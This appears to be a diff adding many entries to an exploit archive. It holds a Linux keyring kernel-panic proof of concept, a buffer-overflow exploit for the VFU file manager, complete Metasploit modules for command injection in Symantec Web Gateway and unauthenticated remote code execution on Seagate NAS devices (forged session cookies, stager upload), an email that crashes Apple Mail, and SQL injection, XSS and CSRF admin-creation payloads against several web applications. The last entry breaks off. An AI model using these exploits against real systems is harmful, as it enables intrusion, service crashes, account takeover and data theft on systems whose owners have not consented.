#include <fcntl.h>
#define TARGET_KERNEL_MIN "3.13.0"
#define TARGET_KERNEL_MAX "3.16.2"
#define EXPLOIT_NAME "cve-2014-3631"
#define EXPLOIT_TYPE DOS
/* ----------------------- functions ----------------------------*/
/**
* Poc for cve_2014_3631 vulnerability
*/
int main()
{
key_serial_t currentKey = 0;
key_serial_t topKey = 0;
int i = 0;
int fp;
char kname[16]={0};
char gc_delay[16] = {0};
int delay =0;
printf("[cve_2014_3631]: Preparing to exploit.\n");
// fetch garbage collector value..
fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY);
if(fp == -1)
{
printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
delay = 300;
}
else
{
read(fp,gc_delay,sizeof(gc_delay-1));
delay = atoi(gc_delay);
close(fp);
}
// Add top key
topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING);
if(topKey == -1)
{
printf("[cve_2014_3631 error]: keyring fault\n");
perror("add_key");
return -1;
}
// Add 18 keys to top key
for(i=0; i< 18; i++)
{
memset(kname,00,sizeof(kname));
memcpy(kname,"Lvl2K_",strlen("Lvl2K_"));
sprintf(kname+strlen("Lvl2K_"),"%d",i);
currentKey = add_key("keyring",kname,NULL,0,topKey);
if(currentKey == -1)
{
printf("[cve_2014_3631 error]: keyring fault\n");
perror("add_key");
return -1;
}
}
/* Entering exploit critical code */
printf("[cve_2014_3631]: Exploit!\n");
// Set timeout and wait for garbage collector
keyctl_set_timeout(currentKey, 2);
// Wait for garbage collector
printf("[cve_2014_3631]: Exploit triggered, system will panic in %d seconds..\n",delay);
return 0;
}

48
platforms/linux/local/36229.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: VFU Move Entry Buffer Overflow
# Date: 2015-02-25
# Exploit Author: Bas van den Berg -- @barrebas
# Vendor Homepage: http://cade.datamax.bg/
# Software Link: http://cade.datamax.bg/vfu/#download
# Version: 4.10-1.1
# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4
# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user
# moves a file entry around with a large filename. To trigger this
# vulnerability, extensive user interaction is required.
# Steps to reproduce the bug: create a file with a large (>115
# characters), run VFU and select 'A' and then 'V' to move the large
# file entry around. Upon confirming the entry move, VFU crashes due to
# a buffer overflow in this function:
'''
void vfu_file_entry_move()
{
char t[128];
sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() );
say1( t );
say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." );
'''
# This overflow allows execution of arbitrary commands with the
# privilege of the current user. The attached PoC demonstrates this. It
# drops two files: the large filename and a shellscript that allows
# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py
import struct
import os
def p(x):
return struct.pack('<L', x & 0xffffffff)
with open('./vstring.h', 'w') as f:
f.write('#!/bin/sh\ntouch pwned')
f.close()
os.chmod('./vstring.h', 0755)
payload = "A"*115
payload += p(0x8049ca0) # system@plt
payload += p(0x804a260) # exit@plt
payload += p(0x8088e44) # -> ./vstring.h
open(payload, 'w').close()

243
platforms/linux/remote/36263.rb Executable file
View file

@ -0,0 +1,243 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Symantec Web
Gateway's setting restoration feature. The filename portion can be used to inject
system commands into a syscall function, and gain control under the context of
HTTP service.
For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
However, for version 5.2.1, you must be an administrator.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Egidio Romano', # Original discovery & assist of MSF module
'sinn3r'
],
'References' =>
[
[ 'CVE', '2014-7285' ],
[ 'OSVDB', '116009' ],
[ 'BID', '71620' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python'
}
},
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Symantec Web Gateway 5', {}]
],
'Privileged' => false,
'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password for the username'])
], self.class)
end
def protocol
ssl ? 'https' : 'http'
end
def check
uri = target_uri.path
res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})
if res && res.body.include?('Symantec Web Gateway')
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def get_sid
sid = ''
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/login.php'),
'method' => 'GET',
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
end
cookies = res.get_cookies
sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
sid
end
def login(sid)
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/login.php'),
'method' => 'POST',
'cookie' => sid,
'headers' => {
'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
},
'vars_post' => {
'USERNAME' => datastore['USERNAME'],
'PASSWORD' => datastore['PASSWORD'],
'loginBtn' => 'Login'
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
end
cookies = res.get_cookies
sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
# Successful login
return sid
else
# Failed login
fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
end
def build_payload
# At of today (Feb 27 2015), there are only three payloads this module will support:
# * cmd/unix/generic
# * cmd/unix/reverse_python
# * cmd/unix/reverse_python_ssl
p = payload.encoded
case datastore['PAYLOAD']
when /cmd\/unix\/generic/
# Filter that one out, Mr. basename()
p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
p = "python -c \"exec('#{p}'.decode('base64'))\""
else
p = p.gsub(/python -c "exec/, 'python -c \\"exec')
p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
end
p
end
def build_mime
p = build_payload
data = Rex::MIME::Message.new
data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
data.add_part('', nil, nil, 'form-data; name="restore"')
data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
data.add_part('0', nil, nil, 'form-data; name="max_events"')
data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
data.add_part('', nil, nil, 'form-data; name="testaddress"')
data.add_part('', nil, nil, 'form-data; name="pingaddress"')
data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
data.add_part('', nil, nil, 'form-data; name="capture_filter"')
data
end
def inject_exec(sid)
uri = target_uri.path
mime = build_mime # Payload inside
send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/restore.php'),
'method' => 'POST',
'cookie' => sid,
'data' => mime.to_s,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'headers' => {
'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
}
})
end
def save_cred(username, password)
service_data = {
address: rhost,
port: rport,
service_name: protocol,
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
print_status("Getting the PHPSESSID...")
sid = get_sid
if sid.blank?
print_error("Failed to get the session ID. Cannot continue with the login.")
return
end
print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
sid = login(sid)
if sid.blank?
print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
return
else
# Good password, keep it
save_cred(datastore['USERNAME'], datastore['PASSWORD'])
end
print_status("Trying restore.php...")
inject_exec(sid)
end
end

43
platforms/osx/dos/36271.py Executable file
View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/50446/info
Apple Mac OS X and iOS are prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected mail client to crash, effectively denying service.
#!/usr/bin/env python
# Mail of death for Apple's Mail.app
#
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42
import smtplib
n_attach=2040 # ~2024 is sufficient
relay='your.mta.goes.here'
mailfrom = 'mail_of_death@example.com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'
def craft_mail():
header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
attach = '--delim\nContent-Disposition: inline\n\n'*n_attach
### Another, slightly longer option to crash Mail.app (same bug)
# attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
return header + body + attach
def send_mail(mail):
server = smtplib.SMTP(relay)
server.sendmail(mailfrom, mailto, mail)
server.quit()
mail=craft_mail()
#print mail
send_mail (mail)

354
platforms/php/remote/36264.rb Executable file
View file

@ -0,0 +1,354 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution',
'Description' => %q{
Some Seagate Business NAS devices are vulnerable to command execution via a local
file include vulnerability hidden in the language parameter of the CodeIgniter
session cookie. The vulnerability manifests in the way the language files are
included in the code on the login page, and hence is open to attack from users
without the need for authentication. The cookie can be easily decrypted using a
known static encryption key and re-encrypted once the PHP object string has been
modified.
This module has been tested on the STBN300 device.
},
'Author' => [
'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
],
'References' => [
['CVE', '2014-8684'],
['CVE', '2014-8686'],
['CVE', '2014-8687'],
['EDB', '36202'],
['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
],
'DisclosureDate' => 'Mar 01 2015',
'Privileged' => true,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
register_options([
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
])
end
#
# Write a string value to a serialized PHP object without deserializing it first.
# If the value exists it will be updated.
#
def set_string(php_object, name, value)
prefix = "s:#{name.length}:\"#{name}\";s:"
if php_object.include?(prefix)
# the value already exists in the php blob, so update it.
return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
end
# the value doesn't exist in the php blob, so create it.
count = php_object.split(':')[1].to_i + 1
php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
end
#
# Findez ze holez!
#
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
)
if res && res.code == 200
headers = res.to_s
# validate headers
if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
# and make sure that the body contains the title we'd expect
if res.body.include?('Login to BlackArmor')
return Exploit::CheckCode::Appears
end
end
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
# something went wrong, assume safe.
end
Exploit::CheckCode::Safe
end
#
# Executez ze sploitz!
#
def exploit
# Step 1 - Establish a session with the target which will give us a PHP object we can
# work with.
begin
print_status("#{peer} - Establishing session with target ...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
}
})
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
cookie_value = $1.strip
else
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
# then update it so that it's an admin session before re-encrypting
print_status("#{peer} - Upgrading session to administrator ...")
php_object = decode_cookie(cookie_value)
vprint_status("#{peer} - PHP Object: #{php_object}")
admin_php_object = set_string(php_object, 'is_admin', 'yes')
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
vprint_status("#{peer} - Admin PHP object: #{admin_php_object}")
admin_cookie_value = encode_cookie(admin_php_object)
# Step 3 - Extract the current host configuration so that we don't lose it.
host_config = nil
# This time value needs to be consistent across calls
config_time = ::Time.now.to_i
begin
print_status("#{peer} - Extracting existing host configuration ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
}
)
if res && res.code == 200
res.body.split("\r\n").each do |l|
if l.include?('general_setup')
host_config = l
break
end
end
else
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
print_good("#{peer} - Host configuration extracted.")
vprint_status("#{peer} - Host configuration: #{host_config}")
# Step 4 - replace the host device description with a custom payload that can
# be used for LFI. We have to keep the payload small because of size limitations
# and we can't put anything in with '$' in it. So we need to make a simple install
# payload which will write a required payload to disk that can be executes directly
# as the last part of the payload. This will also be self-deleting.
param_id = rand_text_alphanumeric(3)
# There are no files on the target file system that start with an underscore
# so to allow for a small file size that doesn't collide with an existing file
# we'll just prefix it with an underscore.
payload_file = "_#{rand_text_alphanumeric(3)}.php"
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
stager = Rex::Text.encode_base64(installer)
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
vprint_status("#{peer} - Stager: #{stager}")
# Butcher the XML directly rather than attempting to use REXML. The target XML
# parser is way to simple/flaky to deal with the proper stuff that REXML
# spits out.
desc_start = host_config.index('" description="') + 15
desc_end = host_config.index('"', desc_start)
xml_payload = host_config[0, desc_start] +
stager + host_config[desc_end, host_config.length]
vprint_status(xml_payload)
# Step 5 - set the host description to the stager so that it is written to disk
print_status("#{peer} - Uploading stager ...")
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => xml_payload
}
)
unless res && res.code == 200
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
end
print_good("#{peer} - Stager uploaded.")
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
print_status("#{peer} - Executing stager ...")
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
payload_cookie_value = encode_cookie(payload_php_object)
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
errored = false
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
'vars_post' => {
param_id => Rex::Text.encode_base64(self_deleting_payload)
}
)
if res && res.code == 200
print_good("#{peer} - Stager execution succeeded, payload ready for execution.")
else
print_error("#{peer} - Stager execution failed (invalid result).")
errored = true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
print_error("#{peer} - Stager execution failed (unable to establish connection).")
errored = true
end
# Step 7 - try to restore the previous configuration, allowing exceptions
# to bubble up given that we're at the end. This step is important because
# we don't want to leave a trail of junk on disk at the end.
print_status("#{peer} - Restoring host config ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
'vars_get' => {
'_' => config_time
},
'vars_post' => {
'general_setup' => host_config
}
)
# Step 8 - invoke the installed payload, but only if all went to plan.
unless errored
print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, payload_file),
'method' => 'GET',
'headers' => {
'Accept' => 'text/html'
},
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
)
end
end
#
# Take a CodeIgnitor cookie and pull out the PHP object using the XOR
# key that we've been given.
#
def decode_cookie(cookie_content)
cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
pass = xor(cookie_value, datastore['XORKEY'])
result = ''
(0...pass.length).step(2).each do |i|
result << (pass[i].ord ^ pass[i + 1].ord).chr
end
result
end
#
# Take a serialised PHP object cookie value and encode it so that
# CodeIgniter thinks it's legit.
#
def encode_cookie(cookie_value)
rand = Rex::Text.sha1(rand_text_alphanumeric(40))
block = ''
(0...cookie_value.length).each do |i|
block << rand[i % rand.length]
block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
end
cookie_value = xor(block, datastore['XORKEY'])
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
vprint_status("#{peer} - Cookie value: #{cookie_value}")
cookie_value
end
#
# XOR a value against a key. The key is cycled.
#
def xor(string, key)
result = ''
string.bytes.zip(key.bytes.cycle).each do |s, k|
result << (s ^ k)
end
result
end
#
# Simple XML substitution because the target XML handler isn't really
# full blown or smart.
#
def xml_encode(str)
str.gsub(/</, '<').gsub(/>/, '>')
end
end

37
platforms/php/webapps/36230.txt Executable file
View file

@ -0,0 +1,37 @@
[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Plugin: https://wordpress.org/plugins/calculated-fields-form/
[+] TimeLine
[-] Feb 6 2015, The vulnerabilities reported
[-] Feb 7 2015, Response and Confirming the vulnerabilities
[-] Feb 8 2015, First fixing released to version 1.0.11
[-] Feb 17 2015, CSRF protection added to version 1.0.12
[-] March 1 2015, Public Disclosure
[+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip
[+] Description:
There are sql injection vulnerabilities in Calculated Fields Form Plugin
which could allow the attacker to execute sql queries into database
[+] Vulnerable Code: [Red]
https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form
[+] POC:
/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText
/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1
/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2 Delete
These queries are execute without any csrf protection, The attacker can use this csrf vulnerability to execute queries in the sql by sending malicious page to the logged in admin
[+] Impact: Attacker can use this vulnerabilities to update admin password
[+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP
[+] @lnxg33k Enta Sa3eed Bahlol?

11
platforms/php/webapps/36259.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50419/info
eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eFront 3.6.10 is vulnerable; other versions may also be affected.
http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--
http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--

118
platforms/php/webapps/36265.txt Executable file
View file

@ -0,0 +1,118 @@
BEdita CMS - XSS & CSRF Vulnerability in Version 3.5.0
----------------------------------------------------------------
Product Information:
Software: BEdita CMS
Tested Version: 3.5.0, released 19.1.2015
Vulnerability Type: Cross-Site Scripting (CWE-79) & Cross-Site Request Forgery, CSRF (CWE-352)
Download link: http://www.bedita.com/download-bedita
Description: A software to create, manage content and organize it with semantic rules. (copied from http://www.bedita.com/what-is-bedita)
----------------------------------------------------------------
Issues:
1) XSS in newsletter mail group creation page.
2) CSRF in user creation page.
----------------------------------------------------------------
Vulnerability description:
1) XSS in newsletter mail group creation page
When an authenticated user of BEdita CMS is creating a newsletter mail group, the following POST request is sent to the server:
POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 523
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132
data[MailGroup][id]=&data[MailGroup][group_name]=<script>alert(0)</script>&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user],
your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user],
you+have+been+unsubscribed+from "[$title]"
The parameter data[MailGroup][group_name] is vulnerable to XSS.
2) CSRF in user creation page
When an authenticated administrative user of BEdita CMS is creating an user, the following POST request is sent to the server:
POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 339
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/viewUser
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132
data[User][auth_type]=bedita&data[User][userid]=csrfadmin99&data[User][auth_params][userid]=&pwd=1qazXSW@&data[User][passwd]=1qazXSW@&data[User][realname]=csrfadmin99&data[User][email]=csrfadmin99@admin.com&data[User][valid]=1&groups=&data[groups][administrator]=on
By executing the following Proof-of-Concept, a new user called "csrfadmin99" will be created with the password "1qazXSW@".
<html>
<body>
<form action="http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser" method="POST">
<input type="hidden" name="data[User][auth_type]" value="bedita" />
<input type="hidden" name="data[User][userid]" value="csrfadmin99" />
<input type="hidden" name="pwd" value="1qazXSW@" />
<input type="hidden" name="data[User][passwd]" value="1qazXSW@" />
<input type="hidden" name="data[User][realname]" value="csrfadmin99" />
<input type="hidden" name="data[User][email]" value="csrfadmin99@admin.com" />
<input type="hidden" name="data[User][valid]" value="1" />
<input type="hidden" name="data[groups][administrator]" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------------
Impact:
1) An attacker is able to leverage on the XSS vulnerability to exploit users of BEdita. An example would be to Inject malicious JavaScript code in order to use attacking tools like BeEF.
2) An attacker is able to create an user account with administrator privilege.
----------------------------------------------------------------
Solution:
Update to the latest version, which is 3.5.1, see https://groups.google.com/forum/?fromgroups#!topic/bedita/SOYrl5C-YRg
----------------------------------------------------------------
Timeline:
Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 11.2.2015
Fix by vendor 19.2.2015
Public Advisory: 1.3.2015
----------------------------------------------------------------
References:
https://github.com/bedita/bedita/issues/591
https://github.com/bedita/bedita/issues/597
----------------------------------------------------------------

11
platforms/php/webapps/36269.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50426/info
SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SjXjV 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5

7
platforms/php/webapps/36270.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50428/info
Plici is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/l1/p48-search.html[XSS]

9
platforms/php/webapps/36272.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50454/info
Domain Shop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php
Search Box
"><script>alert(document.domain)</script>

23
platforms/php/webapps/36273.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/50455/info
vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
